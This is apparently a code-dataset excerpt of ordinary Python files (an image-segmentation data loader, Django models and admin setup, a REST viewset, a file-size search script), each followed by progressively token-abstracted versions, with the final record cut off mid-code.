"import numpy as np\r\nimport cv2\r\nimport time\r\nimport os, sys\r\nimport random as rd\r\n\r\n\r\ndef load_path_list(image_path, gt_path, batch_size, train = True):\r\n\r\n \"\"\"\r\n Load all path of image, there is two case in this code\r\n if train == True then load training image\r\n training image calculate there all size and calculate it's validation size\r\n if train == False then load test image\r\n doesn't calculate anythings\r\n path_list : Data File Name List\r\n Train_size : int\r\n Validation_size : int\r\n \"\"\"\r\n\r\n if train:\r\n print(\"Image Load Started..\")\r\n\r\n path_list = os.listdir(gt_path)\r\n \r\n image_size = len(path_list)\r\n Train_size = image_size // batch_size * batch_size\r\n Validation_size = image_size - Train_size\r\n \r\n if Validation_size < 10:\r\n Train_size -= batch_size\r\n Validation_size += batch_size\r\n \r\n print(\"Train data size : \", Train_size)\r\n print(\"Validation data size : \", Validation_size)\r\n else:\r\n path_list = os.listdir(gt_path)\r\n Train_size = 0\r\n Validation_size = 0\r\n print(\"Test data size : \", len(path_list))\r\n\r\n rd.shuffle(path_list)\r\n\r\n\r\n return path_list, Train_size, Validation_size\r\n\r\ndef load_labels(label_path):\r\n \"\"\"\r\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\r\n Label path can be change when run training code , use --label_path\r\n label : { label naem : label color}\r\n index : [ [label color], [label color]]\r\n \"\"\"\r\n\r\n with open(label_path, \"r\") as f:\r\n\r\n lines = f.readlines()\r\n \r\n label = {}\r\n index = []\r\n for i, line in enumerate(lines):\r\n sp = line.split()\r\n label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]\r\n index.append([int(sp[3]),int(sp[2]),int(sp[1])])\r\n\r\n return label, index\r\n\r\ndef make_label_map(path, label_list):\r\n \"\"\"\r\n make 3D ground Truth image to 1D Labeled image\r\n Images has multi label on each point and I removed last label\r\n Output : [N, H, W]\r\n \"\"\"\r\n \r\n img = []\r\n for name in path:\r\n now = np.zeros((224,224))\r\n im = cv2.resize(cv2.imread(name), (224,224)).tolist()\r\n for y, i in enumerate(im):\r\n for x, j in enumerate(i):\r\n try:\r\n now[y, x] = label_list.index(j)\r\n\r\n except ValueError:\r\n now[y, x] = 0\r\n\r\n img.append(now)\r\n return img\r\n \r\n \r\n\r\n\r\ndef image_load_resize(path):\r\n \"\"\"\r\n make image to 224 * 224 3D image\r\n Output : [N, H, W, C]\r\n \"\"\"\r\n \r\n img = []\r\n for name in path:\r\n \r\n img.append(cv2.resize(cv2.imread(name), (224,224)))\r\n \r\n return img\r\n \r\n\r\n\r\ndef batch(img_path, gt_path,img_list, batch, total_size, label_list):\r\n \"\"\"\r\n Batch Main function\r\n Return image and Label Map\r\n Output : [N, H, W, C], [N, H, W]\r\n \"\"\"\r\n\r\n image_list = [os.path.join(img_path, i) for i in img_list]\r\n gt_list = [os.path.join(gt_path,i) for i in img_list]\r\n\r\n \r\n for i in range(0, total_size, batch):\r\n yield image_load_resize(image_list[i:i+batch]), make_label_map(gt_list[i:i+batch], label_list)\r\n\r\n \r\n",
"import numpy as np\nimport cv2\nimport time\nimport os, sys\nimport random as rd\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\ndef image_load_resize(path):\n \"\"\"\n make image to 224 * 224 3D image\n Output : [N, H, W, C]\n \"\"\"\n img = []\n for name in path:\n img.append(cv2.resize(cv2.imread(name), (224, 224)))\n return img\n\n\ndef batch(img_path, gt_path, img_list, batch, total_size, label_list):\n \"\"\"\n Batch Main function\n Return image and Label Map\n Output : [N, H, W, C], [N, H, W]\n \"\"\"\n image_list = [os.path.join(img_path, i) for i in img_list]\n gt_list = [os.path.join(gt_path, i) for i in img_list]\n for i in range(0, total_size, batch):\n yield image_load_resize(image_list[i:i + batch]), make_label_map(\n gt_list[i:i + batch], label_list)\n",
"<import token>\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\ndef image_load_resize(path):\n \"\"\"\n make image to 224 * 224 3D image\n Output : [N, H, W, C]\n \"\"\"\n img = []\n for name in path:\n img.append(cv2.resize(cv2.imread(name), (224, 224)))\n return img\n\n\ndef batch(img_path, gt_path, img_list, batch, total_size, label_list):\n \"\"\"\n Batch Main function\n Return image and Label Map\n Output : [N, H, W, C], [N, H, W]\n \"\"\"\n image_list = [os.path.join(img_path, i) for i in img_list]\n gt_list = [os.path.join(gt_path, i) for i in img_list]\n for i in range(0, total_size, batch):\n yield image_load_resize(image_list[i:i + batch]), make_label_map(\n gt_list[i:i + batch], label_list)\n",
"<import token>\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\ndef image_load_resize(path):\n \"\"\"\n make image to 224 * 224 3D image\n Output : [N, H, W, C]\n \"\"\"\n img = []\n for name in path:\n img.append(cv2.resize(cv2.imread(name), (224, 224)))\n return img\n\n\n<function token>\n",
"<import token>\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
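A sketch of how the helpers in record 99,888 might be combined for one training epoch; the directory paths, the label file, and the module name voc_data are assumptions, not taken from the source.

from voc_data import load_path_list, load_labels, batch  # hypothetical module with the code above

img_dir = '/data/VOC2012/JPEGImages'        # placeholder paths
gt_dir = '/data/VOC2012/SegmentationClass'
batch_size = 8

# File names are read from the ground-truth directory and shuffled.
path_list, train_size, val_size = load_path_list(img_dir, gt_dir, batch_size, train=True)
label_dict, label_index = load_labels('label.txt')  # placeholder label file

# batch() yields lists of [224, 224, 3] images and [224, 224] label maps.
for images, label_maps in batch(img_dir, gt_dir, path_list[:train_size],
                                batch_size, train_size, label_index):
    pass  # feed the batch into the model here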
99,889 | 34183200317dda1b892b0a190d00f89b01a1f87b | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-12-05 20:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('users', '0002_employee'),
]
operations = [
migrations.CreateModel(
name='Client',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),
('modified', models.DateTimeField(auto_now=True, verbose_name='Modificado em')),
('name', models.CharField(max_length=255, verbose_name='Nome')),
('cpf', models.CharField(max_length=16, verbose_name='CPF')),
('rg', models.CharField(max_length=16, verbose_name='RG')),
('address', models.TextField(blank=True, null=True, verbose_name='Endereço')),
('cellphone', models.TextField(blank=True, null=True, verbose_name='Celular')),
('phone', models.TextField(blank=True, null=True, verbose_name='Telefone')),
(
'employee',
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING,
to='users.Employee',
verbose_name='Vendedora'
)
),
],
options={
'ordering': ['name', 'cpf'],
},
),
]
| [
"# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-12-05 20:54\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('users', '0002_employee'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Client',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),\n ('modified', models.DateTimeField(auto_now=True, verbose_name='Modificado em')),\n ('name', models.CharField(max_length=255, verbose_name='Nome')),\n ('cpf', models.CharField(max_length=16, verbose_name='CPF')),\n ('rg', models.CharField(max_length=16, verbose_name='RG')),\n ('address', models.TextField(blank=True, null=True, verbose_name='Endereço')),\n ('cellphone', models.TextField(blank=True, null=True, verbose_name='Celular')),\n ('phone', models.TextField(blank=True, null=True, verbose_name='Telefone')),\n (\n 'employee',\n models.ForeignKey(\n on_delete=django.db.models.deletion.DO_NOTHING,\n to='users.Employee',\n verbose_name='Vendedora'\n )\n ),\n ],\n options={\n 'ordering': ['name', 'cpf'],\n },\n ),\n ]\n",
"from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('users', '0002_employee')]\n operations = [migrations.CreateModel(name='Client', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Criado em')), ('modified', models.\n DateTimeField(auto_now=True, verbose_name='Modificado em')), (\n 'name', models.CharField(max_length=255, verbose_name='Nome')), (\n 'cpf', models.CharField(max_length=16, verbose_name='CPF')), ('rg',\n models.CharField(max_length=16, verbose_name='RG')), ('address',\n models.TextField(blank=True, null=True, verbose_name='Endereço')),\n ('cellphone', models.TextField(blank=True, null=True, verbose_name=\n 'Celular')), ('phone', models.TextField(blank=True, null=True,\n verbose_name='Telefone')), ('employee', models.ForeignKey(on_delete\n =django.db.models.deletion.DO_NOTHING, to='users.Employee',\n verbose_name='Vendedora'))], options={'ordering': ['name', 'cpf']})]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('users', '0002_employee')]\n operations = [migrations.CreateModel(name='Client', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Criado em')), ('modified', models.\n DateTimeField(auto_now=True, verbose_name='Modificado em')), (\n 'name', models.CharField(max_length=255, verbose_name='Nome')), (\n 'cpf', models.CharField(max_length=16, verbose_name='CPF')), ('rg',\n models.CharField(max_length=16, verbose_name='RG')), ('address',\n models.TextField(blank=True, null=True, verbose_name='Endereço')),\n ('cellphone', models.TextField(blank=True, null=True, verbose_name=\n 'Celular')), ('phone', models.TextField(blank=True, null=True,\n verbose_name='Telefone')), ('employee', models.ForeignKey(on_delete\n =django.db.models.deletion.DO_NOTHING, to='users.Employee',\n verbose_name='Vendedora'))], options={'ordering': ['name', 'cpf']})]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
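For context, the migration in record 99,889 corresponds to a model roughly like the sketch below; this is reconstructed from the migration's field list and is not code from the project, and the Employee import path is an assumption.

from django.db import models
from users.models import Employee  # assumed location of the Employee model

class Client(models.Model):
    created = models.DateTimeField(auto_now_add=True, verbose_name='Criado em')
    modified = models.DateTimeField(auto_now=True, verbose_name='Modificado em')
    name = models.CharField(max_length=255, verbose_name='Nome')
    cpf = models.CharField(max_length=16, verbose_name='CPF')
    rg = models.CharField(max_length=16, verbose_name='RG')
    address = models.TextField(blank=True, null=True, verbose_name='Endereço')
    cellphone = models.TextField(blank=True, null=True, verbose_name='Celular')
    phone = models.TextField(blank=True, null=True, verbose_name='Telefone')
    employee = models.ForeignKey(Employee, on_delete=models.DO_NOTHING,
                                 verbose_name='Vendedora')

    class Meta:
        ordering = ['name', 'cpf']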
99,890 | 08e3a07a2d7f1a2e34dd6a2181b877da1633f5f0 | import xadmin
from .models import Blog, Topic, CollectBookMark
class TopicXadmin(object):
    '''Admin class for the Topic model'''
list_display=['owner','topic_name','is_default','is_delete','addtime']
class BlogXadmin(object):
    '''Admin class for the Blog model'''
list_display=['author','blog_title','category','blog_topic','is_delete','click_num','thumb_num','comment_num','addtime']
class CollectBookMarkXadmin(object):
    '''Admin class for the CollectBookMark model'''
list_display=['owner','bookmark_name','is_default','is_delete','addtime']
# Register the admin classes with xadmin
xadmin.site.register(Topic,TopicXadmin)
xadmin.site.register(Blog,BlogXadmin)
xadmin.site.register(CollectBookMark,CollectBookMarkXadmin)
| [
"import xadmin\r\nfrom .models import Blog,Topic,CollectBookMark\r\n\r\nclass TopicXadmin(object):\r\n '''这是主题的管理类'''\r\n list_display=['owner','topic_name','is_default','is_delete','addtime']\r\n\r\nclass BlogXadmin(object):\r\n '''这是博客的管理类'''\r\n list_display=['author','blog_title','category','blog_topic','is_delete','click_num','thumb_num','comment_num','addtime']\r\n\r\nclass CollectBookMarkXadmin(object):\r\n '''这是收藏夹的管理类'''\r\n list_display=['owner','bookmark_name','is_default','is_delete','addtime']\r\n\r\n#注册\r\nxadmin.site.register(Topic,TopicXadmin)\r\nxadmin.site.register(Blog,BlogXadmin)\r\nxadmin.site.register(CollectBookMark,CollectBookMarkXadmin)\r\n",
"import xadmin\nfrom .models import Blog, Topic, CollectBookMark\n\n\nclass TopicXadmin(object):\n \"\"\"这是主题的管理类\"\"\"\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\nxadmin.site.register(Topic, TopicXadmin)\nxadmin.site.register(Blog, BlogXadmin)\nxadmin.site.register(CollectBookMark, CollectBookMarkXadmin)\n",
"<import token>\n\n\nclass TopicXadmin(object):\n \"\"\"这是主题的管理类\"\"\"\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\nxadmin.site.register(Topic, TopicXadmin)\nxadmin.site.register(Blog, BlogXadmin)\nxadmin.site.register(CollectBookMark, CollectBookMarkXadmin)\n",
"<import token>\n\n\nclass TopicXadmin(object):\n \"\"\"这是主题的管理类\"\"\"\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n\n\nclass TopicXadmin(object):\n <docstring token>\n list_display = ['owner', 'topic_name', 'is_default', 'is_delete', 'addtime'\n ]\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n\n\nclass TopicXadmin(object):\n <docstring token>\n <assignment token>\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass BlogXadmin(object):\n \"\"\"这是博客的管理类\"\"\"\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass BlogXadmin(object):\n <docstring token>\n list_display = ['author', 'blog_title', 'category', 'blog_topic',\n 'is_delete', 'click_num', 'thumb_num', 'comment_num', 'addtime']\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass BlogXadmin(object):\n <docstring token>\n <assignment token>\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass CollectBookMarkXadmin(object):\n \"\"\"这是收藏夹的管理类\"\"\"\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass CollectBookMarkXadmin(object):\n <docstring token>\n list_display = ['owner', 'bookmark_name', 'is_default', 'is_delete',\n 'addtime']\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass CollectBookMarkXadmin(object):\n <docstring token>\n <assignment token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<code token>\n"
] | false |
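The admin classes in record 99,890 only reference field names, so the underlying models are not shown; purely as an illustration, a Topic model consistent with TopicXadmin.list_display could look like the sketch below. Every field type here is inferred from the column names and is an assumption.

from django.db import models
from django.contrib.auth.models import User  # assumed owner type

class Topic(models.Model):
    owner = models.ForeignKey(User, on_delete=models.CASCADE)
    topic_name = models.CharField(max_length=100)
    is_default = models.BooleanField(default=False)
    is_delete = models.BooleanField(default=False)   # soft-delete flag
    addtime = models.DateTimeField(auto_now_add=True)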
99,891 | e2de2cf258ca722c534d93fab1e0ad7fa6f23d9a | #from django_filters.rest_framework import DjangoFilterBackend ; in case you want only the selected apps to have this kind of filter.
from rest_framework.viewsets import ModelViewSet
from atracoes.models import Atracao
from .serializers import AtracaoSerializer
class AtracaoViewSet(ModelViewSet):
queryset = Atracao.objects.all()
serializer_class = AtracaoSerializer
#filter_backends = (DjangoFilterBackend,)
    filter_fields = ['name','description','min_age'] | [
"#from django_filters.rest_framework import DjangoFilterBackend ; Caso queira que apenas as aplicações selecionadas possuam esse tipo de filtro.\nfrom rest_framework.viewsets import ModelViewSet\nfrom atracoes.models import Atracao\nfrom .serializers import AtracaoSerializer\n\nclass AtracaoViewSet(ModelViewSet):\n queryset = Atracao.objects.all()\n serializer_class = AtracaoSerializer\n #filter_backends = (DjangoFilterBackend,)\n filter_fileds = ['name','description','min_age']",
"from rest_framework.viewsets import ModelViewSet\nfrom atracoes.models import Atracao\nfrom .serializers import AtracaoSerializer\n\n\nclass AtracaoViewSet(ModelViewSet):\n queryset = Atracao.objects.all()\n serializer_class = AtracaoSerializer\n filter_fileds = ['name', 'description', 'min_age']\n",
"<import token>\n\n\nclass AtracaoViewSet(ModelViewSet):\n queryset = Atracao.objects.all()\n serializer_class = AtracaoSerializer\n filter_fileds = ['name', 'description', 'min_age']\n",
"<import token>\n\n\nclass AtracaoViewSet(ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
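To expose the AtracaoViewSet from record 99,891 over HTTP it would normally be registered with a DRF router; a minimal sketch follows. The import path and the 'atracoes' URL prefix are assumptions, and filtering only takes effect if filter_backends is configured (per view or via DEFAULT_FILTER_BACKENDS) with django-filter installed.

from django.urls import include, path
from rest_framework.routers import DefaultRouter

from atracoes.api.viewsets import AtracaoViewSet  # assumed module path

router = DefaultRouter()
router.register('atracoes', AtracaoViewSet, basename='atracao')

urlpatterns = [
    path('api/', include(router.urls)),
]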
99,892 | 7522d7ca8d17c717918ed406e8ca9898ab7c786c | """
3. Implement a search mode for file sizes.
-> The file being searched for is 3010349 bytes in size
"""
import os
output = open('output7.txt', 'w', encoding='utf-8')
for var_root, var_dirs, var_files in os.walk('c:\\', topdown=False):
for var_name in var_files:
if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:
print(os.path.join(var_root, var_name), file=output)
output.close() | [
"\"\"\"\n3. Implementiere einen Suchmodus für Dateigrößen.\n-> Gesucht wird eine Datei mit 3010349 Byte\n\"\"\"\nimport os\n\noutput = open('output7.txt', 'w', encoding='utf-8')\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()",
"<docstring token>\nimport os\noutput = open('output7.txt', 'w', encoding='utf-8')\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()\n",
"<docstring token>\n<import token>\noutput = open('output7.txt', 'w', encoding='utf-8')\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()\n",
"<docstring token>\n<import token>\n<assignment token>\nfor var_root, var_dirs, var_files in os.walk('c:\\\\', topdown=False):\n for var_name in var_files:\n if os.stat(os.path.join(var_root, var_name)).st_size == 3010349:\n print(os.path.join(var_root, var_name), file=output)\noutput.close()\n",
"<docstring token>\n<import token>\n<assignment token>\n<code token>\n"
] | false |
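The same search as in record 99,892, reworked into a small reusable function with the root directory and target size as parameters; a sketch rather than a drop-in replacement, and it skips files that cannot be stat'd.

import os

def find_files_by_size(root, target_size):
    """Yield paths under root whose size in bytes equals target_size."""
    for dirpath, _dirnames, filenames in os.walk(root, topdown=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
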